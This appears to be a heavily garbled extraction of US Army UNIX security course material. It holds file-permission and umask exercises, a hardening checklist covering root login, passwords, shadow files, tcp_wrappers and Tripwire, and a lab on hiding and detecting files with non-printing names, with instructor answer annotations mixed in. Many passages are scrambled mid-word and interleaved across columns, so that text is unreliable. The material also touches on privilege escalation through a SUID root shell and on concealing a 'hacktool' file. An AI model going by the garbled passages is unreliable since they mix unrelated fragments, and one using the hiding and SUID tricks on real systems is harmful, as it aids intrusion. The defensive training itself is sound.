                                            7           7         7        7 
                                    4 2 1    

                                            s s t      r w x    r w x    r w

 on the screen                                         s           s          t 
                                                         r w x     r w x    r w x 

 
21.  Lets examine a file that is 
   
 a.  View permissions for the /e
 

b.  Notice that the owne is sys.  Neither owner, group, or 
other has anything but read authority.  This means that only root may edit this file as root 
has explicit write capab sword, 
you must involve root. 

 
 c.  View the permission f
l‸/bin/passwd 
 

d.  You will notice that permissions are -r-sr-sr-x.  Both the Set UID and Set GID are turned 
nd sys.  This means everyone can run this program (other 
 be assigned the effect fective UID of root.  

 is running, th e person that ran it has 
t and sy rd even 

ck the acc

ser file ut, you create a file and it gets 
can b -rw-rw-) 
rwxrw uirements.  

up categorie may be receiving permissions that are above normal requirements.  
addre

 work  

both a Set UID and a Set GID file. 

tc/passwd file.  # ls‸-l‸/etc/passwd 

r of the file is root and the group 

ility on files.  This also means in order to change your pas

s o  the program you run to change your password.  # ls‸-

on.  It is owned by root a
executable) and they will ive GID of sys and the ef

e system will see thWhile the /bin/passwd program
having both roo
though you la

 
22. Umask stands for "u
a default permission that 
and a directory 777 (rwx
The others and gro
An umask setting would 
 
Examples of how umask
 

Permission

s authority.  This is what allows you to change your passwo
ess. 

-creation mode mask".  More simply p
e masked out.  The default permission for a file is 666 (rw
x).  These permissions do not meet our "least access" req
s 
ss this problem.   

s:

 Mode Setting Umask 
Setting 

 
 7 

•Execute Access       1  

 default for text 

r w - r 
w -               •No Access                 0 

System
file(Solaris) 
666  r w - 

umask 
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 6 
•Write Access       2  

 5 
•Read Access       4  

 3 
•Full Control       7  

0 
 

022  - - - - w - - 

 result  
 r w - r - - r - 

 

 

 

w -   
End
644 

- 

Permissions          7     7     7 
 
(-)Umask               0   
 
End permissions   7
 
 

 

  3     3   (-)End Permissions                     7     5     5 

     4     4    

Permissions                      7     7     7 

   

       Umask                        0     2     2

 
23. Below are some f
file type, the next 3
the other’s privil

ile permis n tifies the 
 the owner’s pr roup’s privileges, and the last three 

eges.  ( r = 4, w = 2, x  --------t = 1***)  
lace the correct "octal" number next  Ignore 

le:  -rw-rw-rw-  

____444

sio s.  Remember that the first character from the left iden
ivileges, the next three the g

 =1 )   (--s------ = 4***)  ( -----s--- = 2***) (
P to each permission listed.  Output can be 3 or 4 digits. 
the file type.  (Examp
 
a.  dr--r--r--  

 =   666) 

_____ b.  br--r--r--  ____________ 

____________ xrwxrwx ____________ 

xr-xr-x  ____________ ---  ____________ 
 
g.  -r-sr-x-- _____4551

 
c.  -rwxr-xr-x  
 
e.  -r-

d.  lrw

f.  cr-----

x  ___ 
 
 i.  brwxrw _______ x ____________ 
 
k.  ---S -- _______ _
 
m.  crw-rw _ 
 
24. Solve for the umask results.  (Example:  666 (text file) 027 (umask)  =  640) 
 
File default

h.  drwx---r-x  ____________ 

xrwx _____ j.  srwxrwxrw

--l x  

-rw- ____________ 

__ __ l.  dr----S--T  ____________ 

n.  -r-sr-sr-x  ___________

  umask value  results (octal) 
a.  666    002  ____664____ 
 
b.  666    046  ___________ 
 
c.  777  046  ___________ 
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d.  777    011  ___________ 
 
e.  666    011  ___________ 
 
f.  666    033  ___________ 
 
g.  777    077  ___________ 
 
h.  666  055  ___________ 
 
i.  777    055  ___________ 
 
j.  666    013  ___________ 

 following permission values.  (Example:  chmod 555  =  r-xr-xr-x) 

    ___r-xr-xr-t

  

 
 
25. Write out the
 
a.  chmod 1555   = _______        b.  chmod 6775  =    _________________ 

   _________________
 
c.  chmod 2744  =          d.  chmod 4501  =    _________________ 

_____________         f.  chmod 611    =    _________________ 

________

________

 early, spend s e the 
or desktop u

 
e.  chmod 0444  =    ____
 
g.  chmod 4040 =    _
 
i.   chmod 7000 =    ____
 
 
26. If you finish
directory structure 
 

________         h.  chmod 1111  =    _________________ 

______        j.  chmod  3111  =  __________________ 

ome time getting acquainted with the Unix system.  Examin
ntil everyone is ready to discuss the PE. 
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Best Security Practices 
 
Least Privilege   

Vulnerability Countermeasure 
A user should only 
have the access they 

�1.  Users do not need elevated access to perform normal job 

require to perform their 
functions 

 

mission. 
 

�2.  Applications should not run with more access than they 
require 
�3.  Developers do not need administrator access 
�4.  Keep the number of root level accounts to a minimum 
�5.  Users should be assigned to groups that are in keeping

with their level of access. 
 
Patches 

Vulnerability Countermeasure 
Failure to stay current 
with available vendor 
patches may leave your 

�1. Use the command #showrev –p  to list patches installed 
on your system 
 

system vulnerable to 

ith ACERT for the 

r your version of 
nix. 

 {PRIVATE}RETRIEVE the latest patch list from your 
ries to be sure you 

have the latest "approved" patch). 
nded for your 

system. Some patches may re-enable default 
configurations. For this reason, it is important to go 
through this checklist AFTER installing ANY

attack. Always check vendor (NOTE: Check ACERT adviso
w
latest approved patches  INSTALL patches that are recomme
fo
U
  new 

ries. 

patches or packages. 
 ALWAYS review the Readme files. 

 
NOTE:  Ensure that current vulnerability patches are loaded 

as provided by the vendor and listed in ACERT/CC 
adviso

 
 
Secure terminals   

Vulnerability Countermeasure 
By default, on most 
Unix systems, root 
may log on from any 
terminal.  This allows 
the root account to be 
accessed from 
anywhere in the 
network.  A malicious 
attacker can target the 
root account to 
compromise your 

�1.  DISABLE network login for root.  All unencrypted root 
account access must take place on the physical console.   
The files to check may be called /etc/ttys, /etc/default/login, 
/etc/securetty, or /etc/security 
  

For the /etc/ttys file, ADD: 
Console “etc/getty std_9600” vt100 on local secure 
For the /etc/default/login file, ADD: 
CONSOLE=/dev/console 

 
See the manual pages for file format and usage information 
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f UNIX. 

om all 

le if you do not want 
t in single user mode.  

sability of the su command.  

�4.  ENSURE that the file is owned by root. 

#chmod 640 /etc/default/login 
wn root /etc/default/login 

�5.  For Linux systems, edit the /etc/securetty file to contain:  
o not put in any pseudo terminals such 

system. for your version o
  

�2.  ENSURE that the secure option is removed fr
entries that don’t need root login capabilities. The secure 
option should be removed from conso
users to be able to reboo

NOTE: This does not affect u
�3.  ENSURE that the permissions on this file are 640.  

 
#ls –l /etc/default/login 

#cho
 

tty1, tty2, etc.  D
as ttyp1.  A tty* entry restricts root to only local logon.  
(The "*" symbol represents a number) 

 
 

ock Workstations  L
Vulnerability Countermeasures 

If a user leaves their 
kstation unattended 

� 1. LOCK your workstation whenever you walk away 
• Right-click the display backw

a
or

nd doe
worksta

or
ssocia

system
 

ground and select "Lock 
Display" from the menu pop-up box. 

f a "lock" on 
l automatically 

 workstation.  The password to unlock the 
f the login. 

s not lock the 
tion,  

unauthorized personnel 
could access the 

kstation and the 

• Some Unix GUI's will display an icon o
the menu bar.  Clicking on this icon wil
lock thew

a ted network. workstation is equal to that o
 . 

 
Screen Saver Passwords 

Vulnerability Countermeasure 
If a user leaves their 

kstation unattended 
� 1.   IMPLEMENT a Screen Saver Password  

• Open up your desktop controls pwor
nd the screen saver is 

una
cou
wor
sso

roperties section of 
the GUI and set the desired time for the Screen to 

 that 
a
not password protected, 

uthorized personnel 
ld access the 
kstation and the 
ciated network. 

initiate the lock.  There is normally a check box
you would also check to turn on the feature. 

• Set screen saver to execute no later than 10 minutes 
after last activity. 

 a
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s  Backup
Vulnerability Countermeasures 

Sin
con
sen
from

pas

hysical access to your 
stem. 

 

use 

apes on a 
regular basis.  This ensures that you have good 
backup tapes. 

ILD your system from a set of backup tapes to 
re complete. 

• KEEP your backup tapes under lock and key. 

r possible. 

ce backup tapes 
tain all of your 
sitive information 

 your system, to 

� 1. MAKE regular backups. 
• UPDATE your backups whenever you update or

change your system. 
• ENSURE that EVERYTHING on your system is 

include user data, and 
swords, they 

addressed in on your backup plan. 
• DO NOT reuse a backup tape too many times beca

become a target for it will eventually fail. 
anyone who has • RESTORE a few files from your backup t
p
sy
 • REBU

be certain that your backup procedures a

• Keep written records of key backup and system 
configuration information. 

• Store back-up tapes off-site whenever possible. 
• Encrypt back-up tapes wheneve

 
 
Root account  

Vulnerability Countermeasure 
Gaining root access is 
the p

.  

x.  

This account should be 
protected at all costs. 
 

�1.  IAW HQ DA SAIS-IAS message DTG R 050951Z MAR 
99, ALL unencrypted root account access must take 

ng the 
are not transmitted in the clear. 

• E d to the 

 
and Sol 8. 

 
If the file co
Rem  the line that contains the 
entry 
CONSOLE=/dev/console 
• RESTRICT the number of people who know the root 

password. These should be the same users registered with 
groupid 0. Typically this is limited to at most 3 or 4 
people.  

CONSIDER the use of sudo 
 

rimary goal of 
every hacker trying to 
get into your system
Root has absolute 
control over your bo
If an attacker gains 
root access, it’s no 
longer your system.  

place on the physical console.  Programs such as secure 
shell (ssh) should be used for remote login, ensuri
passwords 

• DO NOT log in as root over the network.  
NSURE that direct logon for root is limite

system console. 
NOTE: This is enabled by default on Solaris 2.6, Sol 7

#grep CONSOLE /etc/default/login 
Line should be CONSOLE=/dev/console 

ntains the entry, make sure it is uncommented. 
ove the # at the beginning of
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DO NOT use the root account for routine activities that can 
be done under a regular user ID. 

• su from user accounts rather than logging in as root. This 
ovides greater accountability.  

• ENSURE that root does not have a ~/.rhosts file.  
 

#ls -la / 
#rm /.rhosts  

• ENSURE that "." is NOT

pr

 
 in root’s search path.  

Use set to display the value of the PATH variable. 
• ENSURE that root’s home directory is something other 

than “/” (i.e. /roothome), and has permissions of 700. 

#mkdir /roothome 
#chmod 700 /roothome 
#grep root /etc/passwd 

Edit the /etc/passwd file to reflect the new home directory 

• ENSURE that root’s login files do not source any other 
files not owned by root or which are group or world-
writeable.  
Note:  Root, by default, is usually assigned the Bourne 

#more .profile 
 
• ENSURE that root cron job files do not source any other 

files not owned by root or which are group or world-

 
#cat /usr/spool/cron/crontabs/* 

 
USE absolute path names when logged in as root, e.g., 

/bin/su, /bin/find, /bin/passwd. This is to stop the 
possibility of root accidentally executing a trojan horse. 
To execute commands in the current directory, root 
should prefix the command with "./", e.g., ./command. 

 

 

shell  

writeable.  

 
 
 
 
Files run by root 

Vulnerability Countermeasure 
Files not owned by �1.  CHECK the contents of the files
root, if ran by root, 
may compromise root 
ccess or perform 

 listed below.  Any 
programs or scripts referenced in these files should meet the 
following requirements

a
:  

1. ANYTHING run by root SHOULD be owned by root. 

Kelly Larsen
(2-1)
Page: 35�a) A program that changes its UID (user ID)
b) Sometimes underprivileged users must be able to accomplish tasks that require privileges.

Kelly Larsen

(2-2)
Using the ls -l command, the owner privileges will show an "s" where the "x" (executable privilege) would be.

Kelly Larsen

(2-3)
Any user could become a Super User by running a SUID copy of a shell that is owned by root.

Kelly Larsen

(2-4)
Specify the "nosuid" option with the mount command.


Kelly Larsen
(2-5)
If the sticky bit is set on a directory, files inside the directory may only be renamed or removed by the owner of the file, owner of the directory, or the super user.
 

Kelly Larsen
(2-6)
An extension to standard unix file permissions


Kelly Larsen
(2-7)
Used to determine file permissions for newly created files.  It specifies the permissions you do not want given by default to newly created files and directories.


Kelly Larsen
(2-8)
666              rw-rw-rw-
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nwanted. 3. SHOULD be located in a directory where every directory 
in the path is owned by root. 

4. IS NOT group or world-writeable. 
 

- /.login, /.profile, ./cshrc and similar login initialization 
files.  

  
- /.logout and similar session cleanup files  
- crontab and at entries  

rtitions  
-  /etc/rc* and similar system startup and shutdown files  
- If any programs or scripts referenced in these files source/call 

s or scripts they also need to be verified and meet 
. 

#chmod 555 file 
#chown root file 

functions that are 2. SHOULD NOT be group or world-writeable.  
u

CHECK the contents of these files: 

- /.exrc and similar program initialization files

- files on NFS pa

additional program
the requirements of 1-4

 
Administration 

Vulnerability Countermeasure 
A password/security 

olicy is only as good 
  

�1.  -IAW HQ DA SAIS-IAS message DTG R 050951Z 
MAR 99, all system administrators will review date stamp for 
each user account password for compliance with current 
Army policy. 
�2.  - IAW HQ DA SAIS-IAS message DTG R 050951Z 

MAR 99, all systems will be configured to limit logon 
attempts to three tries by timing out or disabling them. 

 
ALL user files should be routinely backed up utilizing 

ufsdump. 
 
• CONSIDER imposing quotas on users.  
Consult the manual pages on quotaon and edquota for 

specifics. 
quotaon turns on disk quotas for one or more ufs file systems. Before a 
file system may have quotas enabled, a file named quotas, owned by 
root, must exist in the root directory of the file system. The file system 
specified must already be mounted.  edquota allows you to specify one 
or more users and limit how many files they may create. 
 
• REQUIRE users to physically identify themselves before 

granting any requests regarding accounts (e.g., before 
creating a user account). 

 
It is recommended that users sign a UserID Receipt Form at 

the time that they are assigned a userid/password. 
 

p
as its enforcement. 

Kelly Larsen
(2-9)
777             rwxrwxrwx


Kelly Larsen
(2-10)
This will depend on your flavor of unix.  It could either be set in the  /etc/profile  or the  /etc/default/login    file.


larsenk
Login ID and password

larsenk
Unix uses the crypt() function to take the users password, a salt value and a block of zeros to create a password hash that is retained in either the /etc/passwd or /etc/shadow file

larsenk
Pluggable Authentication Module.  PAM is a unified approach to authenticating multiple authentication systems.

larsenk
Change read-only filesystems, unmount a filesystem with open files, write directly to a directory or create a hard link to a directory (some systems), decrypt the passwords stored in the shadow password file

larsenk
A more restrictive su.  It restricts a user down to a single command or directory of commands
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• ENSURE that each user account has a unique name, and 
UNIQUE user id (UID) [usually greater than 100]. 

 
#cat /etc/passwd 

#cat /etc/shadow 
 
ENSURE that every user account is assigned to at least one 

n duplicate 

 
 file. 

group. 
ENSURE that normal users are NOT assigned to privileged 

groups. 
ENSURE that the /etc/group file does not contai

GIDs. 
ENSURE that every group referenced in the /etc/passwd
file is defined in the /etc/group

Password Policy 
Vulnerability Countermeasure 

Weak, easily guessed �1.  Passwords on all systems MUST comply with AR
passwords allow access 

nauthorized 

fficiency. 

25-2, 
Password Control. 

 applies to the Active Army, the Army 
National Guard of the U.S. (ARNGUS), and the United States 

SAR). It applies to contractors who operate 
my 

rmation Systems) that process or store Army 
ntractors who process Sensitive But 

Unclassified (SBU) information on contractor-owned AIS are 
regulation if specified in the contractual 

requirements or if they connect to an installation AIS/network 
he above must comply with sections 1 through 

ent, or national emergency, this 
mains in effect without change. 

 
nix, if using DES,  only the first 8 characters of 

a password are significant.  Unix will truncate any password 
r less.  This is a default behavior and cannot 

be modified. 

• Passwords will also contain UPPERCASE, lowercase, 

ll be 
set to 90 days. 

s 
150 days.  

 
password length are set in the /etc/default/passwd file. 

to accounts by This regulation
u
personnel.  Passwords 

f insufficient length 
Army Reserve (U
Government-owned or contractor-owned, AIS (Aro

increase password 
cracking tool's 

Automated Info
information. Co

e
governed by this 

system. All of t
8, Act of 8 January 1988, PL 100-235, 101 Stat 1,724-1,730. 
During mobilization, deploym
regulation re

NOTE:  In U

to 8 characters o

• Passwords must be at least 10 characters in length 

numbers, or special characters (2 of each) 
• Passwords will not contain personal information, or any 

part of the user login name or full name 
• Minimum time before a password can be changed wi

• Maximum time before a password has to be changed i

• The maximum and minimum time for passwords and

Kelly Larsen
no

Kelly Larsen
no

Kelly Larsen
no

Kelly Larsen
yes

Kelly Larsen
\005
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Proactive Checking 

Vulnerability Countermeasure 
Dormant accounts, �1.  CHANGE default system passwords which were created 
backdoor system 

ccounts without 

nauthorized access to 

when software was installed 

�2.  MAKE sure that all accounts have a password.  
ypted 

password. 

/etc/shadow 

�3.  MAKE sure that users that should no longer have access 
are removed from all the systems to which they had access.   

You must do this on every system on which the user 
had a valid account. 

#grep username /etc/passwd 

passwords, and  
a
passwords allow The second field of /etc/shadow should contain an encr
u
the system. Ensure that users listed in /etc/passwd are listed in 

 

Inactive accounts inactive for 45 days should be disabled. 

 
�4.  MAKE sure the system is configured to limit logon 

attempts to three tries by timing out or disabling them. 
 
• MAKE sure that the home directories and files of users 

removed from the system are also deleted or moved to the 
ownership of someone else.  

 
 
Password Shadowing  

Vulnerability Countermeasure 
Most c

passwo
The permis

le are mo
an th
tc/pa

revent
an ro
e file or attempting to 
ake a copy of the file 

nd then attempt to 
rack u

urrent versions 
of Unix/Linux/BSD 
have implemented 

rd shadowing.  
sions on this 
re restrictive fi

th ose on the 
sswd file.  This /e

p s anyone other 
ot from reading th

th
m
a
c ser passwords. 

�1.  ENABLE vendor supplied password
third party product. With password shado

 shadowing or a 
wing, the encrypted 

#cat /etc/passwd  
#cat /etc/shadow 

Suggest backing it up regularly via a cron job and checking 

3.   that the /etc/shadow file is accessible only by 

password hash is kept in /etc/shadow which has a 1 to 1 
relationship to the /etc/passwd file.  
The pwconv command is normally used to implement 
shadow passwords. Check your vendor documentation. 
 
�2.  PERIODICALLY audit your password and shadow 
password files for unauthorized additions or inconsistencies.  
 

what changes have been introduced. 
 
� ENSURE

Kelly Larsen
////hacktool

Kelly Larsen
It would be difficult, not knowing directory names.  rm /ctrl-E/crtl-E/crtl-E/hacktool

Kelly Larsen
////

Kelly Larsen
rm /ctrl-E/ctrl-E/ctrl-E/ctrl-B

gvh
UNIX PE1. EXA Q13A No files should have been found.


gvh
UNIX PE1. EXA Q13B The files .\007 and ch\007mod were found.   The \007 found in the file name is strange.  The files were not found in the previous command because we were not looking for non-printable characters (the –b option on the ls command).
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NOTE:  root ownership is enabled by default on the 
root. 

/etc/shadow file.    
#ls -l /etc/shadow 
#chmod 400 /etc/shadow 

 
 
Restricted Shell  

Vulnerability Countermeasure 
Many systems
provide “open 
accounts”, gue
ccounts or ftp
ox” account, an 

that acc
urther 

curity
 
Restricted s

it so

ccount will create.  

• The user 

can’t 
change the 
value of the 

ment
e 

 
r 

er 

0951Z MAR 
r 

Solaris: 
(restricted Bourne shell) 
 (restricted Korn shell) 

does not include “.”or “::” 
Check the manual pages for your version of UNIX. 
Files that contained the PATH variable are diverse.   
/etc/profile or 

/etc/skel/  

/usr/lib/mkuser/shell_name 

/etc/d.cshrc or stdcshrc 

In imple
set auto ithin the .cshrc file 

NOTE : this option is not available with all versions of c-shell 

 must �

st 
 “drop-

application specific accounts. 
 a

b
intruder can use an 
open account to gain 

/usr/bin/rsh 
/usr/bin/rksh

initial access to your 
machine and then use 

NOTE: There is no such thing as a restricted C-shell. 

ess to probe 
for greater 

 
• ENSURE that the account’s default PATH statement 

f
se  lapses. 

hells can 
me of the /usr/profile lim

vulnerabilities that 
having access to a open 

 
Also check in the following directories: 

a
The main advantages 
re: 

/usr/skel/ 
/etc/security/ a

can’t 
change the 
current 

/etc/d.profile or stdprofile  
/etc/d.login or stdlogin 

directory 
• The user 

 
• DISCONNECT users after a period of inactivity 

PATH 
environ
al variabl
(even 
though they
own thei
.profile) 

• The us
can’t use 

1.  IAW HQ DA SAIS-IAS message DTG R 05
99, ENABLE restricted shells to limit access fo

mentation of the C shell,  
logout=??  W

gvh
UNIX PE1 EXA Q14A.  The file is found in the /var/preserve directory.


Kelly Larsen
yes
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rt 

commands 
at root) 

• The user 
can’t 
redirect 
output with 
> or >>  

If the user attempts to 
interrupt the restricted 
shell while it is 
processing the 
$HOME/.profile, 
restricted shell will 
immediately exit. 

command 
names 
containing 
slashes 
(means they
can’t sta

 
Special accounts 

Vulnerability Countermeasure 
Special and optional 
accounts have caused 
numerous problems for 
system administrators.  
Access to these 
accounts gives 
attackers elevated 
privileges, which will 
ultimately be used to 
gain root access.  
These accounts should 
be disabled wherever 
possible. 

�1.  ENSURE that there are no shared accounts other than 
root in accordance with site security policy, i.e. more 
than one person should not know the password to an 
account. 

 
NOTE:  Some systems utilize Roll Based Access Control 

(RBAC) to break down administrator functions to 
specific tasks.  Accounts are then created with only the 
necessary privileges required for completion of the 
particular task. 
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Tripwire (ACERT APPROVED) 
Tripwire is a util ital 
ignature, then com

.  

 watches file 
s checksums of files to produce signatures that shouldn't change. 

em.  It protects you from 
ablish a policy in the 

ity that scans a set of designated files and directories, computes a dig
pares the digital signature/fingerprint to a signature previously s

generated and stored in a database. Differences are flagged and logged including additions 
and deletions. When used regularly it enables a system administrator to spot any changes to 
iles and directories rapidlyf

 
Tripwire has 9 levels of security descriptors for each file or directory it monitors.  It can 
monitor files that can not be changed, binaries with the SUID/SGID bit set, read only 
binaries, configuration files, logs, directory permissions/ownership, members of the trusted 
omputing base, Kernel processes, and dynamic Kernel processes.  Tripwirec

sizes and compute
 
Tripwire is a good tool for keeping Trojan horses off of your syst

al data files.  You estunauthorized persons toying with your critic
twpol.txt file that consists of variable and rule definitions.  The Tripwire polic

ok for, and whe
y tells 
n to alert you tripwire what files to examine, what types of information to lo

to changes. Tripwire utilizes a site and local pass-phrase to encrypt tripwire policies, 
from being tampered with.   databases, and configuration files to keep them 

 
It can be found at: https://www.acert.belvoir.army.mil/ACERTmain.htm 
 

OTE:  It does not currently function with the Solaris 8 x86 platform. N
 
 
Sudo 
Sudo is a program designed to allow a sysadmin to give limited root privileges to users and 

s as possible but still allow 
gured in the sudoer file.  The commands or 

user allowed to 

o

log root activity. The basic philosophy is to give as few privilege
people to get their work done.   Sudo is confi
directories from which commands can be run are identified by the individual 
run them.  The sudolog records activity. 
 
It is available at: http://www.courtesan.com/sud  or 

ftp://coast.cs.purdue.edu/pub/tools/unix/sysutils/sudo 
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tcp_wrapper (ACERT APPROVED) 
tcp_wrapper: This software gives logging and access control to most network services.  
- IAW HQ DA SAIS-IAS message DTG R 050951Z MAR 99,  tcp wrappers are 
recommended for all UNIX systems.  Ensure the program is downloaded from a verifiable 
source-ACERT web site has tcp wrappers and portmap available at 
https://www.acert.belvoir.army.mil/ACERTmain.htm. 
Contact your supporting ACERT/CC or RCERT for assistance. 
• TCP Wrappers will provide additional logging, a banner, reverse DNS lookup, and 

access control. 
• CUSTOMIZE and install it for your system. 
It is available from the ACERT site:  https://www.acert.belvoir.army.mil/ACERTmain.htm 
 
• ENABLE PARANOID mode. 

Note: This is usually enabled by default. 
 

• CONSIDER running with the RFC 931 option. 
This is a connection-based application on TCP. A server listens for TCP connections on TCP 
port 113 (decimal). Once a connection is established, the server reads one line of data which 
specifies the connection of interest. If it exists, the system dependent user identifier of the 
connection of interest is sent out the connection. The service closes the connection after 
sending the user identifier.  
 
• DENY all hosts by putting “all:all” in /etc/hosts.deny and explicitly list trusted hosts 

who are allowed access to your machine in /etc/hosts.allow. 
 

#more /etc/hosts.deny  
#more /etc/hosts.allow 

• WRAP all TCP services that you have enabled in /etc/inet/inetd.conf or 
/etc/inetd.conf, or other appropriate file. 

 
Modify the /etc/inetd.conf. For example, to modify telnet: 
Original entry:  
telnet  stream  tcp  nowait  root /usr/sbin/in.telnetd  in.telnetd 
Modified entry: 
telnet stream tcp nowait  root /usr/sbin/in.tcpd /usr/sbin/in.telnetd 
 

• CONSIDER wrapping any udp services you have enabled. If you wrap them, then you 
will have to use the nowait option in the /etc/inet/inetd.conf file. 

 
• TCP Wrappers is high speed, low drag protection that does not require additional 

communications between the client and server.  It serves as a stateless firewall, applying 
rules prior to allowing connections.   New releases of some OS's already come with TCP 
Wrappers incorporated into a xinetd.conf file for use by the xinetd program. 
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SEC IP
• IPSEC is a security arch

layer) security solution t
itecture for the IP protocol.  It is a layer 3 (network 
hat is an Internet standard and is not dependent 

rticular encryption or authentication algorithm or operating 

l:  

on any pa
system.  IPSEC is transparent to upper-level protocols and applications.   
IPSEC provides authentication, encryption, integrity, and replay protection. 

• IPSEC uses two protocols to provide security at the IP leve
Authentication Header (AH) and Encapsulating Security Payload (ESP). 

• IPSEC has two modes:  Transport and tunnel modes 
• IPSEC may be used to configure a VPN (virtual Private Network) 
 
 
Npasswd (ACERT APPROVED) 
�1.  USE npasswd as a replacement for the default Unix passwd command. 
 
Npasswd (new password) is a replacement for th

corporates a password ck
e system passwd command that 

che ing system (word lists) that refuses poor password selections.  
t also i

This program reduces the chance of 
 
t is available from: https://www.acert.belvoir.army.mil/ACERTmain.htm

in
I ncorporates the crack utility to eliminate easily guessed passwords from being used. 

users choosing poor passwords.   

I  

 
Penetration Testing 

Vulnerability Countermeasure 
One of the best tests of �1.  Start your penetration testing with the simplest methods 
your security is to 
break into your system.  

first.

Hacking your own 
Internet.  

�
system

ackdoors that may 
exist fo

  Use common tools readily available on the 
  

�3.  Any weaknesses identified by the penetration testing 

by step plan and document findings as you encounter 
them. 

 can identify 
2.  Analyze the access control infrastructure for 

vulnerabilities and single points of failure. 
b

r the hacker.   should be fixed immediately 
 
NOTE:  Make sure that the testing is authorized and 

conducted with management's knowledge.  Create a step 

 

gvh
UNIX PE1 EXA Q3A. Yes, the entry CONSOLE=/dev/console is found in the /etc/default/login file.  This entry requires the root login to be executed from the console system.

gvh

Page: 39� UNIX PE1 EXA Q4A.  No.
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Practical UNIX
 
Pages 82 – 121

 
1. Expl UID program is and why it is used? 
 
 
 
 
2. How set? 
 
 
 
 
. What security problems can occur with the SUID set? 

 

 

. How can you turn off the SUID and SGID on mounted file systems? 

 
5. Wha

 

 
. What is an access control list? 

ue used for in UNIX? 

8. Wha s applied? 

 

 

Reading Assignment 2 
Day 2 – Subject: UNIX Security 

 & Internet Security 

, 131 – 154 
 

ain what a S

 can you tell if a file has the SUID 

3

 

 
4
 
 
 

t is the purpose of the sticky bit being set on directories? 
 

 

6
 
 
 
 
7. What is an umask val
 
 
 
 

t are the default file permissions before an umask i
 

 

gvh

Page: 40� UNIX PE1 EXA Q6A. The shells /bin/false and /dev/null should not be added to the /etc/shells.  These shells are used to disable accounts from logging in.   Placing a false shell in the /etc/shells file enables that account for ftp access even if the account is assigned a false shell.


Kelly Larsen
This will print out a listing of account and shell        (uucico is a file transfer program for uucp)

gvh
UNIX PE1 EXA Q7A Only root has an authorized shell at this point and time.  /bin/sh was not included in the /etc/shells file.  Accounts which do not have an authorized valid shell should be given an authorized valid shell.

gvh

Page: 40� UNIX PE1. EXA Q9A. The login should have been rejected.  An error message “User shell not listed in /etc/shells file” should have been displayed.
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. What are the default programs and directory permissions before an umask is applied? 

ask value. 

 
11.  W  /etc/passwd and /etc/shadow file? 
 

 and what is its purpose? 

 the sup

9
 
 
 
 
10.  Name two (2) files that may be used to set the system um
 

hat information is found in both the

 
12.   Describe how Unix encrypts the password 
 
 
13.   What is the PAM
 
 
 
14.  What are the things
 
 
 
 
15.  What is sudo? 
 
 
 

eruser can not do? 

gvh

Page: 41� UNIX PE1. EXA Q12A The file /devices/pseudo/run does not have an identifiable owner or group.  Depending on the system and/or the patches implemented there may be other files.
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urity

 Exercise SAS-7A 

 
 is to ge
written  what is in bold.  The ‸ symbol indicates where 

pe ^E

y and m

re in a direct y other than "/", type:  # cd 
 
2.  Make a directory with a non
 
3.  Change to that directory.  T
 
4.  Make a new directory.  Typ
 
5.  Change to that directory.  Type:  #   
 
6.  Make a new directory.  Typ
 
7.  Change to that directory.  T
 

.  Create a file.  Type:  # touch‸ hacktool 

u see it?  ______________ 

3.  se the ‸-al command to see your ^E directory.  Do you see it?

4.  Does the ls‸-alb command show you the ^E directory?  ______________________ 

the ^E directory print out as?  _______________________ 

UNIX System Sec

Practical
EXERCISE A 

The purpose of this PE
Commands to type are 
you put in a space.  To ty
 
1.  Check your director
  
 a.  If you a

 

t you familiar with hidden file names and how to detect them.  
 bold.  Only typein

, hit the control key and letter e at the same time. 

ake sure you are in the root directory ( / ).  Type:  # pwd 

or

-printing character (control-E).  Type:  # mkdir‸ ^E 

ype:  # cd‸ ^E 

e:  # mkdir‸ ^E 

cd‸ ^E

e:  # mkdir‸ ^E 

ype:  # cd‸ ^E 

8
 
9.  Create another file.  Type:  # touch‸ ^B 
 
10. Go back to the root directory.  Type:  # cd 
 
11.  Use the ls command to see your ^E directory.  Can yo
 
12. Use the ls‸-a command to see your ^E directory.  Do you see it?  ______________ 
 

U   ls   _____________ 1
 
1
 
15. What does the name of 
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6. Try and find the file you created.  Type:  # find‸ /‸ -name‸ hacktool 

8  Write the proper syntax to delete the file using the rm command (rm /directory/filename).  

 

0.  Using your answer in step 19, write the proper syntax that will delete (rm) the ^B file.  What is 

______
 
 

1. Lets check the computer for any and all hidden nonprinting characters that have been used in 
and prompt#, type:  ls  -laR  | grep  '\\'  

‘ ‘ 

   

 
_______________________________________________________________________ 

________________________________________________________________________ 

At the command prompt#, e: s  -labR  | grep  '\\'  
 

21B. What files or directories were found?  What is strange about these files?  Why were 

___________________________________ 

__________________________________ 

 
 
 

Using the table below, identify the character that is defined by the octal characters in the file 
name.  Omit the ones that you created earlier. 

1
 
17. What is the location for the hacktool file?  ________________________________ 
 
1
 
 ______________________________________________________________________ 

19.  Now try and find the ^B file using syntax similar to step 16.  What is its location? 
 
_______________________________________________________________________ 
 
2
the syntax? 
 

__________________________________________________________________ 

 
2
the creation of file or directory names.  At the comm
 
Note: The first non-character symbol in the command is the vertical bar (pipe).  The symbols in 
are back slashes. 
 

21A. What files or directories were found?  No files found are an acceptable answer.  

 

 
typ  l

   

the files not displayed in the previous command?   Notice that only the -b flag for ls will 
display nonprinting characters.  Grep couldn’t find the “\” until –b forced it to print. 

 
____________________________________

 
______________________________________

 

 

gvh
UNIX PE1 EXA Q20A.  The contents of the file, wfiles, provides a list of files which have the write permission set for group, other or both.  Yes. The items are listed one per line.


gvh
UNIX PE1 EXA Q21A. The ‘Write’ permission for Group and Other is set on 5333 of the files (solaris 8)  429 (Solaris 9).  The actual number will vary by < ( 1%.  Also the base number will vary from lab to lab.  The default file permissions leave a potential hole in the system.  Unfortunately, many of these holes are required for the system to function properly.
  

gvh
UNIX PE1 EXA Q22A. The contents of the file, wdirs, provides a list of directories which have the write permission set for group, other or both


gvh
UNIX PE1 EXA Q23A. The ‘Write’ permission for Group and Other is set on 674 of the directories (Solaris 8)  44 (Solaris9).  The actual number will vary by < ( 1%.  Also the base number will vary from lab to lab.  The default directory permissions leave potential hole in the system.  Unfortunately, many of these holes are required for the system to function properly.
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Decimal Octal Hex Character Remark 
 
 0  000 00 CTRL-@ NUL (Null prompt) 
 1  001 01 CTRL-A SOH (Start of heading) 

 3  003 03 CTRL-C ETX (End of text) 
C

 5  005 05 ENQ (Enquiry) 

 7  007 07 CTRL-G BEL (Bell) 

 9  011 09 CTRL-1 HT (Horizontal tab) 

pe:  find / -name  .^G
Note: To create the ^G, press the CTRL key and the G key 
simultaneously. 

22A. Where is the file?  
 
________________________________________________________ 

 
Now le

 

